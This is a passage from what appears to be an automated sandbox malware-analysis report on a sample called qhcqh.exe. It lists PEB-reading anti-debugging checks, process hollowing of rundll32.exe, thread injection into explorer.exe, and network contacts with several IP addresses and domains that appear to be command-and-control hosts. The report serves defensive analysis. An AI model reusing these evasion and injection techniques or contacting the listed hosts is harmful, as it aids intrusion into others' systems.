          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov ecx, dword ptr fs:[00000030h]2_2_012CF0BF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]2_2_012CF0BF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]2_2_012CF0BF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299080 mov eax, dword ptr fs:[00000030h]2_2_01299080
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]2_2_01313884
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]2_2_01313884
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012958EC mov eax, dword ptr fs:[00000030h]2_2_012958EC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]2_2_012940E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]2_2_012940E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]2_2_012940E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]2_2_0132B8D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135131B mov eax, dword ptr fs:[00000030h]2_2_0135131B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129DB60 mov ecx, dword ptr fs:[00000030h]2_2_0129DB60
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]2_2_012C3B7A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]2_2_012C3B7A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129DB40 mov eax, dword ptr fs:[00000030h]2_2_0129DB40
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368B58 mov eax, dword ptr fs:[00000030h]2_2_01368B58
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129F358 mov eax, dword ptr fs:[00000030h]2_2_0129F358
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]2_2_012C4BAD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]2_2_012C4BAD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]2_2_012C4BAD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 mov eax, dword ptr fs:[00000030h]2_2_01365BA5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]2_2_012A1B8F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]2_2_012A1B8F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134D380 mov ecx, dword ptr fs:[00000030h]2_2_0134D380
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2397 mov eax, dword ptr fs:[00000030h]2_2_012C2397
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CB390 mov eax, dword ptr fs:[00000030h]2_2_012CB390
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135138A mov eax, dword ptr fs:[00000030h]2_2_0135138A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BDBE9 mov eax, dword ptr fs:[00000030h]2_2_012BDBE9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]2_2_012C03E2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]2_2_013153CA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]2_2_013153CA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]2_2_012D4A2C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]2_2_012D4A2C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A8A0A mov eax, dword ptr fs:[00000030h]2_2_012A8A0A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]2_2_0135AA16
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]2_2_0135AA16
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B3A1C mov eax, dword ptr fs:[00000030h]2_2_012B3A1C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]2_2_01295210
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov ecx, dword ptr fs:[00000030h]2_2_01295210
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]2_2_01295210
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]2_2_01295210
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]2_2_0129AA16
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]2_2_0129AA16
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]2_2_0134B260
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]2_2_0134B260
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368A62 mov eax, dword ptr fs:[00000030h]2_2_01368A62
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D927A mov eax, dword ptr fs:[00000030h]2_2_012D927A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135EA55 mov eax, dword ptr fs:[00000030h]2_2_0135EA55
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01324257 mov eax, dword ptr fs:[00000030h]2_2_01324257
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]2_2_01299240
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]2_2_01299240
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]2_2_01299240
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]2_2_01299240
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]2_2_012952A5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]2_2_012952A5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]2_2_012952A5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]2_2_012952A5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]2_2_012952A5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]2_2_012AAAB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]2_2_012AAAB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFAB0 mov eax, dword ptr fs:[00000030h]2_2_012CFAB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]2_2_012CD294
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]2_2_012CD294
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2AE4 mov eax, dword ptr fs:[00000030h]2_2_012C2AE4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2ACB mov eax, dword ptr fs:[00000030h]2_2_012C2ACB
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368D34 mov eax, dword ptr fs:[00000030h]2_2_01368D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0131A537 mov eax, dword ptr fs:[00000030h]2_2_0131A537
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135E539 mov eax, dword ptr fs:[00000030h]2_2_0135E539
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]2_2_012C4D3B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]2_2_012C4D3B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]2_2_012C4D3B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AD30 mov eax, dword ptr fs:[00000030h]2_2_0129AD30
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]2_2_012A3D34
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]2_2_012BC577
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]2_2_012BC577
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D3D43 mov eax, dword ptr fs:[00000030h]2_2_012D3D43
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313540 mov eax, dword ptr fs:[00000030h]2_2_01313540
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01343D40 mov eax, dword ptr fs:[00000030h]2_2_01343D40
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B7D50 mov eax, dword ptr fs:[00000030h]2_2_012B7D50
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C35A1 mov eax, dword ptr fs:[00000030h]2_2_012C35A1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]2_2_012C1DB5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]2_2_012C1DB5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]2_2_012C1DB5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]2_2_013605AC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]2_2_013605AC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]2_2_01292D8A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]2_2_01292D8A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]2_2_01292D8A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]2_2_01292D8A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]2_2_01292D8A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]2_2_012CFD9B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]2_2_012CFD9B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01348DF1 mov eax, dword ptr fs:[00000030h]2_2_01348DF1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]2_2_012AD5E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]2_2_012AD5E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]2_2_0135FDE2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]2_2_0135FDE2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]2_2_0135FDE2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]2_2_0135FDE2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov ecx, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]2_2_01316DC9
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CBC2C mov eax, dword ptr fs:[00000030h]2_2_012CBC2C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]2_2_01351C06
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]2_2_0136740D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]2_2_0136740D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]2_2_0136740D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]2_2_01316C0A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]2_2_01316C0A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]2_2_01316C0A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]2_2_01316C0A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B746D mov eax, dword ptr fs:[00000030h]2_2_012B746D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]2_2_0132C450
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]2_2_0132C450
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CA44B mov eax, dword ptr fs:[00000030h]2_2_012CA44B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040CF43 LdrLoadDll,2_2_0040CF43
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00C564EA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C55BF4 SetUnhandledExceptionFilter,1_2_00C55BF4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C59D4C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00C5450E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C55BF4 SetUnhandledExceptionFilter,2_2_00C55BF4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00C564EA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00C59D4C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00C5450E

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.themssterofssuepnse.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.249 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.159.142 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.karlscurry.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.116.162 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fanversewallet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.181.216.141 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.allison2patrick.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.4.21.190 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.virginhairweave.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.ty23vip.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thelastwill.net
          Source: C:\Windows\explorer.exeDomain query: www.gorwly.top
          Source: C:\Windows\explorer.exeDomain query: www.hudsonandbailey.uk
          Source: C:\Windows\explorer.exeDomain query: www.g2fm.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.landlotto.ru
          Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ketoibabal.cyou
          Source: C:\Windows\explorer.exeDomain query: www.mynichemarket.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.181 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.brennmansoluciones.com
          Source: C:\Windows\explorer.exeDomain query: www.dirdikyepedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.245.24.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E30000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\qhcqh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exeJump to behavior
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.785129007.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475538694.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
